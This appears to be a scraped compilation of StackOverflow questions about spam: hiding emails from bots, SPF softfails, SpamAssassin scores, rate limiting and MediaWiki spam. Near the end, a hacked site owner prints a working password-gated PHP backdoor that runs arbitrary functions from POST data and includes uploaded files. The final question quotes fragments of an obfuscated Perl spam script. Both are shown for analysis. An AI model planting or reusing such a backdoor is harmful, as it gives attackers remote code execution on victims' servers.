EzDevInfo.com

spam interview questions

Top spam frequently asked interview questions

Effective method to hide email from spam bots

On my homepage, I'm using this method to hide my email from spam bots:

<a href="admin [at] example.com"
   rel="nofollow"
   onclick="this.href='mailto:' + 'admin' + '@' + 'example.com'">Contact me</a>

What do you think about it? Is it effective? What other methods do you know or use?


Source: (StackOverflow)

Blocking comment spam without using captcha [closed]

What are some non-captcha methods for blocking spam on my comments?


Source: (StackOverflow)

Should I use the Reply-To header when sending emails as a service to others?

Suppose we have an application that acts as a middleman, allowing Company A to send reports to their customers.

Company A --> Company B (me)--> Company A's customers

After getting the report we send email notifications to the recipients, but they necessarily originate from our company notifications email address e.g.

joe.bloggs@a.com --> notifications@b.com --> peter@c.com

Now, customers tend to reply to those email notifications, wanting them to go back to whoever sent the report at Company A. Instead, they end up back at our address, notifications@b.com.

A simple solution may be to change the Reply-To header on the notifications we send to the relevant Company A address e.g.

joe.bloggs@a.com --> notifications@b.com [Reply-To: joe.bloggs@a.com] --> peter@c.com

But my main concerns are:

  • the complete discrepancy in email address and domain between the From and Reply-To fields might make spam or phishing filters more eager to flag the emails
  • not all email clients may respect the Reply-To field when people actually click "Reply", and just use From instead. A lesser concern, unless widespread.

Are these concerns founded at all? Or, are there other concerns I should have?


Source: (StackOverflow)

Why should I convince developers to use port 587 for all SMTP communication?

There is a growing trend to use port 587 for all client to MTA communications. It's in a standards track RFC: http://www.ietf.org/rfc/rfc2476.txt

My question is "Why?". Why have 2 instances of an SMTP server running on the same server, if they both do the same thing? What security feature does it provide, besides giving me 2 things to troubleshoot as an administrator?

This just seems like unnecessary complication that isn't needed unless the ISP blocks port 25. Even then, if the ISP is blocking port 25 to prevent spam, it just means it will just take a little more time until port 587 is blocked too, and we will have to use a different port altogether.

Just seems like we are creating more work for ourselves rather than solving the problem and authenticating SMTP to begin with.


Source: (StackOverflow)

SPF issue: what causes softfail?

Whenever I use PHP to send emails to members of my site, the email ends up in the spam folder for most email providers like Gmail and Hotmail.

When I check the original source in Gmail, I see the following:

Delivered-To: mypersonalmail@gmail.com
Received: by 10.236.41.34 with SMTP id g22cs272510yhb;
Wed, 1 Jun 2011 05:38:27 -0700 (PDT)
Received: by 10.236.77.102 with SMTP id c66mr7228248yhe.303.1306931907131; Wed, 01 Jun 2011 05:38:27 -0700 (PDT)
Received-SPF: softfail (google.com: best guess record for domain of transitioning info@mywebserver.com does not designate as permitted sender)
Received: by 10.190.5.195 with POP3 id 3mf1156376yxt.72; Wed, 01 Jun 2011 05:38:27 -0700 (PDT)
X-Gmail-Fetch-Info: info@mywebserver.com 14 mail.mywebserver.com 110 info@mywebserver.com
Return-path:
Envelope-to: info@mywebserver.com
Received: from mybestsh by s01.next-web.nl with local (Exim 4.69)
(envelope-from )
id 1QRkgT-0000BF-3v
for info@mywebserver.com; Wed, 01 Jun 2011 14:38:01 +0200
To: info@mywebserver.com
Subject: Your new password
MIME-Version: 1.0
From: MyServer
Reply-To: MyServer
X-Sender: MyServer

I have set up my SPF records as follows: v=spf1 a mx ip4:xxx.xxx.xx.xx-all

I am wondering what causes the softfail. Any ideas?

Best regards, Rick


Source: (StackOverflow)

Online SpamAssassin evaluation / RFC conformant check [closed]

I want to check the SpamAssassin SPAM score of E-Mails including headers generated by a script from a WebApp.

Therefore I need to run this mail through SpamAssassin to get the specific SPAM headers like:

Yes, score=6.032 
HTML_IMAGE_ONLY_24=1.282 
HTML_MESSAGE=0.001 
HTML_MIME_NO_HTML_TAG=0.635 
MIME_HEADER_CTYPE_ONLY=1.996 
MIME_HTML_ONLY=1.105
RP_MATCHES_RCVD=-0.001 
SPF_PASS=-0.001 
SUBJECT_NEEDS_ENCODING=0.1
SUBJ_ILLEGAL_CHARS=1.105
T_REMOTE_IMAGE=0.01 

One possibility could be to install SpamAssassin on the server and run it through this installation.

Is there some online service where I can paste/send the mail to and this service gives me the SPAM headers?

Yes, I know that you can configure SpamAssassin with different settings and therefore the SPAM score may vary from installation to installation, but a basic evaluation would help already.

Or is there a possibility to check the RFC conformance of a message? (Because SpamAssassin also evaluates this (eg. MIME_HTML_ONLY which means that you have no plain text content and therefore the mail isn't RFC conformant)).

Thanks!!


Source: (StackOverflow)

Gmail is filtering my web app's email as spam [closed]

We have a business web application that periodically sends emails as reminders, links to client data, etc. Our company uses Google Apps for our email provider (with our own domain name), and the web application sends email through Google with SMTP.

The problem is that Google Apps / Gmail keeps marking the messages as spam, even for the inboxes in our domain name. No other email provider seems to mark it as spam (but of course we haven't tested them all...).

We've tried various formulations of the body text: i.e. including more contextual information, addressing the recipient by name, but so far with no apparent changes. This makes me think it may be something about our email sending process, rather than the content of the email, that's causing the emails to be marked as spam.

Things that we tried but that didn't solve the problem:

  • "From" address is valid and not spoofed
  • SPF records are correct, and show as "pass" in the email header
  • Since we are connecting to Google's SMTP server to send email, it's not an issue with a blacklisted IP address (however, our website has a static IP address that is not blacklisted).
  • Email is not very spammy: I've checked against several online spam filter tests, and the email body always shows up as extremely unlikely to be filtered.
  • HTML body vs plain-text body seems to make no difference.
  • We send a small volume of email: probably 0-10 emails per day, so I don't see how that would make this suspicious.
  • Whenever we have access to the receiving inbox (i.e. it belongs to an employee of our company), we've been marking the emails as "not spam", since Gmail may be using communal statistics to determine spam. After a couple times this results in emails to that particular inbox getting through, but doesn't seem to help other accounts.

What else can we try?

If it makes a difference, we're sending emails using an ASP.NET site running .NET 3.5. A typical email gets sent like this:

var message = new MailMessage(new MailAddress(from), new MailAddress(to)) {
    Subject = subject,
    Body = body,
    IsBodyHtml = true
};

// SMTP details stored in web.config 
new SmtpClient { EnableSsl = true }.SendAsync(message, null);

EDIT: I've seen this similar question: How to stop Gmail from marking mails sent by my web app as spam?, but the situation is a little different since we can reproduce it by sending and receiving from the same Google Apps domain. Besides, I believe I have covered all of the proposed solutions for that question.


Source: (StackOverflow)

Spam is being sent using my domain, what can I do?

Since it was released I've been using Google Apps FYD for stackednotion.com. All of the email I send goes through Google's servers and I use Gmail to view my email. I haven't had any issues before, however recently I've been seeing weird bouncebacks ending up in the catch all account. It looks like somebody is using my domain to send spam. I don't really want my domain getting marked with a bad reputation, so how can I stop this?

I have set up SPF, DMARC and DKIM on the domain by following the guides on Google Apps, here is my zone file:

; stackednotion.com [9548]
$TTL 86400
@   IN  SOA ns1.linode.com. luca.stackednotion.com. 2012072633 7200 7200 1209600 86400
@       NS  ns1.linode.com.
@       NS  ns2.linode.com.
@       NS  ns3.linode.com.
@       NS  ns4.linode.com.
@       NS  ns5.linode.com.
@           MX  1   ASPMX.L.GOOGLE.COM.
@           MX  5   ALT1.ASPMX.L.GOOGLE.COM.
@           MX  5   ALT2.ASPMX.L.GOOGLE.COM.
@           MX  10  ASPMX2.GOOGLEMAIL.COM.
@           MX  10  ASPMX3.GOOGLEMAIL.COM.
@           MX  30  ASPMX4.GOOGLEMAIL.COM.
@           MX  30  ASPMX5.GOOGLEMAIL.COM.
@           TXT "v=spf1 include:_spf.google.com ~all"
google._domainkey           TXT "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDi19ipSdqDEpnJEWrVF7MarSLnlzXi0wPOHws2BY6oMQInbY5OHzdw9LcFr1biVvipErm4odyJfjZAIp5s8r6z50ZxQdW5Uwdy9krA1A9HMPaqVN+fm2xpntU//uXn0wD8sGc9CljYQIl+MusxQ690PfVGnAz/QeLqaZFxpHHmmQIDAQAB"
_dmarc          TXT "v=DMARC1; p=quarantine; rua=mailto:dmarc@stackednotion.com"
@           A   178.79.164.64
*           A   178.79.164.64
_xmpp-server._tcp       SRV 5 0 5269 xmpp-server.l.google.com.
_xmpp-server._tcp       SRV 20 0 5269 alt1.xmpp-server.l.google.com.

Also here are the headers of a spam message (somebody tried to subscribe me to a Zend mailing list, what kind of sick people are they?!?):

Return-Path: <F776387@stackednotion.com>
Received: (qmail 20117 invoked from network); 27 Jul 2012 06:51:01 -0000
Received: from exprod7mx200.postini.com (HELO psmtp.com) (64.18.2.92)
  by rsmx2.zend.com with SMTP; 27 Jul 2012 06:51:01 -0000
Received: from source ([188.51.41.223]) by exprod7mx200.postini.com ([64.18.6.13]) with SMTP;
        Fri, 27 Jul 2012 02:51:00 EDT
To: <fw-docs-subscribe@lists.zend.com>
Subject: Invoice #48469883494
From: "Order" <F776387@stackednotion.com>
Date: Sat, 28 Jul 2012 09:40:03 +0300
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: IPS PHP Mailer
MIME-Version: 1.0
Content-type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Message-ID: <20120728094003.9312B884F9D66F02CE7C@DELL-PC>
X-pstn-neptune: 500/484/0.97/100
X-pstn-levels:     (S: 0.00346/89.11253 CV:99.9000 FC:95.5390 LC:95.5390 R:95.9108 P:95.9108 M:97.0282 C:98.6951 )
X-pstn-dkim: 0 skipp

Source: (StackOverflow)

Preventing bot form submission

I'm trying to figure out a good way to prevent bots from submitting my form, while keeping the process simple. I've read several great ideas, but I thought about adding a confirm option when the form is submitted. The user clicks submit and a Javascript confirm prompt pops up which requires user interaction.

Would this prevent bots or could a bot figure this out too easily? Below is the code and JSFiddle to demonstrate my idea:

JSFIDDLE

$('button').click(function () {
  if(Confirm()) {
    alert('Form submitted');
    /* perform a $.post() to php */
  }
  else {
    alert('Form not submitted');
  }
});

function Confirm() {
  var _question = confirm('Are you sure about this?');
  var _response = (_question) ? true : false;
  return _response;
}

Source: (StackOverflow)

How would I protect an API from abuse?

Hey everyone, I run an image hosting website and I'm designing an API for it. My concern is that I don't want anyone to be able to do something like:

while(true) { 
    Upload();
}

and spam/DoS the site.

My current solution is to limit all IP addresses to a certain amount of uploads per day/hour. I believe this will work fine for desktop applications that will use the API, but for websites that wish to use it, all the users will have the same IP (the server's).

I suppose the best solution would be to have user accounts that authenticate with the API, and then ban each account if they abuse it. The problem with this is that my site has no user accounts at all, it's all completely anonymous.

What else can be done? I would like to keep things as open as possible, while at the same time have the ability to ban users/IPs who are obviously abusing the service.


Source: (StackOverflow)

PHP: Anti-Flood/Spam system

I'm actually working on a PHP project that will feature a user system (login, register, send lost password to email, ...) and I think that this may be very vulnerable to brute-force attacks and/or spam (send a password to someone's email like 1000 times, etc.; use your fantasy).

  • Do today's webservers (Apache, IIS) have some sort of built-in defense against Brute-Force?
  • What would be the best way to implement an anti-spam/flood system if, e.g., I want a page not to be able to be called more than two times a minute, while another page may be called up to 100 times a minute or so?

    • I would definitely have to store IP addresses, the time when they last visited a page and the number of visits somewhere - but would it be efficient enough storing it in a text-file/database (MySQL)?

    • Should I use captchas for things like registering/recovering lost passwords?

    • Are "text" captchas viable? (Something like "What is 5 plus 9 minus 2? ")

    • The page won't be used by that many users (100-200), do I actually have to implement all these things?


Source: (StackOverflow)
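
The per-page limits described in the question above (two calls a minute for one page, 100 for another), together with the per-IP cap and shared-server-IP concern from the earlier API question, as an added Python example that is not part of either post. The page paths, the `client_key` helper and the optional per-website API key are assumptions; state is held in process memory here, whereas a PHP site would keep the same timestamps in a shared store.

```python
import time
from collections import defaultdict, deque

# Assumed per-page limits: (max requests, window in seconds).
LIMITS = {
    "/recover-password": (2, 60),   # sensitive page: two calls a minute
    "/gallery": (100, 60),          # ordinary page: 100 calls a minute
}


class SlidingWindowLimiter:
    """Keeps recent request timestamps per (client key, page) in memory."""

    def __init__(self, limits, clock=time.monotonic):
        self.limits = limits
        self.clock = clock
        self.hits = defaultdict(deque)

    def allow(self, key, page):
        max_hits, window = self.limits[page]
        now = self.clock()
        recent = self.hits[(key, page)]
        while recent and now - recent[0] >= window:
            recent.popleft()          # timestamp has aged out of the window
        if len(recent) >= max_hits:
            return False              # refused requests are not recorded
        recent.append(now)
        return True


def client_key(ip, api_key=None):
    """Prefer an API key (assumed to be issued per integrating website) so
    that many users behind one server IP do not share a single budget."""
    return f"key:{api_key}" if api_key else f"ip:{ip}"


def demo():
    """Constructed traffic driven by a fake clock; returns the decisions."""
    now = [0.0]
    limiter = SlidingWindowLimiter(LIMITS, clock=lambda: now[0])
    anon = client_key("203.0.113.7")
    site = client_key("203.0.113.7", api_key="site-a")
    decisions = [limiter.allow(anon, "/recover-password") for _ in range(3)]
    decisions.append(limiter.allow(site, "/recover-password"))  # own budget
    now[0] = 61.0
    decisions.append(limiter.allow(anon, "/recover-password"))  # window passed
    return decisions


if __name__ == "__main__":
    print(demo())
```

The `hits` table grows with the number of distinct keys, so a long-running deployment would also evict idle entries.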

How can I lower the spam score of my email message?

I am sending a new logon and password to a user, however when I do on a test version of our site on the internet the spam score is 4.6 by SpamAssassin. Which means it gets trapped.

The Email is HTML (so the marketing dept have their nice fonts and colours) with a linked image.

The MailMessage() object does not appear to give me a lot of control over the output format of the message.

What measures could I take to lower the spam score?

I am sending using this:

/* send an email */
MailMessage msg = new MailMessage();
msg.IsBodyHtml = true;
//msg.BodyEncoding = Encoding.UTF8;
msg.To.Add(new MailAddress(sToEmail));
msg.From = new MailAddress(sFromEmail);
msg.Subject = sEmailSubject;
msg.Body = sEmailTemplate;
try
{
    client.Send(msg);
}
catch (SmtpException)
{
    throw; // surface delivery failures to the caller
}

The spam score is this:

X-Spam-Score: 4.6 (++++)
X-Spam-Report: Spam detection software report (4.6 points):
    pts rule name              description
    ---- ---------------------- --------------------------------------------------
    1.8 HTML_IMAGE_ONLY_20     BODY: HTML: images with 1600-2000 bytes of words
    0.0 HTML_MESSAGE           BODY: HTML included in message
    1.7 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
    1.1 HTML_MIME_NO_HTML_TAG  HTML-only message, but there is no HTML tag
    0.1 RDNS_NONE              Delivered to trusted network by a host with no rDNS

Source: (StackOverflow)

How to prevent mediawiki spam [closed]

My MediaWiki site is currently under attack by spammers. I get around 10 spam pages registered daily.

What I've already done:

  1. Only users with confirmed emails can create/edit pages.
  2. ReCAPTCHA widget (http://www.mediawiki.org/wiki/Extension:ConfirmEdit#ReCaptcha). Captcha displayed on the actions:
     a) 'edit' - triggered on every attempted page save
     b) 'create' - triggered on page creation
     c) 'addurl' - triggered on a page save that would add one or more URLs to the page
     d) 'createaccount' - triggered on creation of a new account
  3. Proxy blocker
  4. SpamBlacklist

What else should I add in order to stop it?

I'm wondering, are real people registering all these spam pages or is it done by bots? Not sure whether ReCAPTCHA has already been hacked and can be tricked by a bot... am I wrong? Every spam page on my wiki is registered under a new user's account. So, it's necessary to register a new account, fill in the ReCaptcha, confirm the email and only after that register a spam page. Is it possible to do all these steps automatically?

Thanks in advance for any suggestions, Alex


Source: (StackOverflow)

Got hacked! What does this PHP code do? And how should I avoid? [closed]

I was hacked, and apparently they were sending spam emails. There were two files that they injected into my server (that were duplicated across all sub-directories). One is a heavily hashed PHP file that may be the sender. The code below is from the other file.

Here's my question -- What is this accomplishing? I can't translate its purpose. Also, what should I do to avoid allowing this to happen again?

<?php

if(@md5($_POST['pass'])!=='692e3f52ee6f16bc78fa6e1ec4bd4a6a')
    die();
@extract($_POST);

if(!empty($a))
    @$a($b);

if(!empty($_FILES['tmp_name']))
    @include($_FILES['tmp_name']);

?>

Source: (StackOverflow)

Decrypt obfuscated perl script

Had some spam issues on my server and, after finding and removing some Perl and PHP scripts, I'm down to checking what they really do. Although I'm a senior PHP programmer, I have little experience with Perl. Can anyone give me a hand with the script here:

http://pastebin.com/MKiN8ifp

(It was one long line of code, script was called list.pl)


The start of the script is:

$??s:;s:s;;$?::s;(.*); ]="&\%[=.*.,-))'-,-#-*.).<.'.+-<-~-#,~-.-,.+,~-{-,.<'`.{'`'<-<--):)++,+#,-.{).+,,~+{+,,<)..})<.{.)-,.+.,.)-#):)++,+#,-.{).+,,~+{+,,<)..})<*{.}'`'<-<--):)++,+#,-.{).+:,+,+,',~+*+~+~+{+<+,)..})<'`'<.{'`'<'<-}.<)'+'.:*}.*.'-|-<.+):)~*{)~)|)++,+#,-.{).+:,+,+,',~+*+~+~+{+<+,)..})

It continues with precious few non-punctuation characters until the very end:

0-9\;\\_rs}&a-h;;s;(.*);$_;see;

Source: (StackOverflow)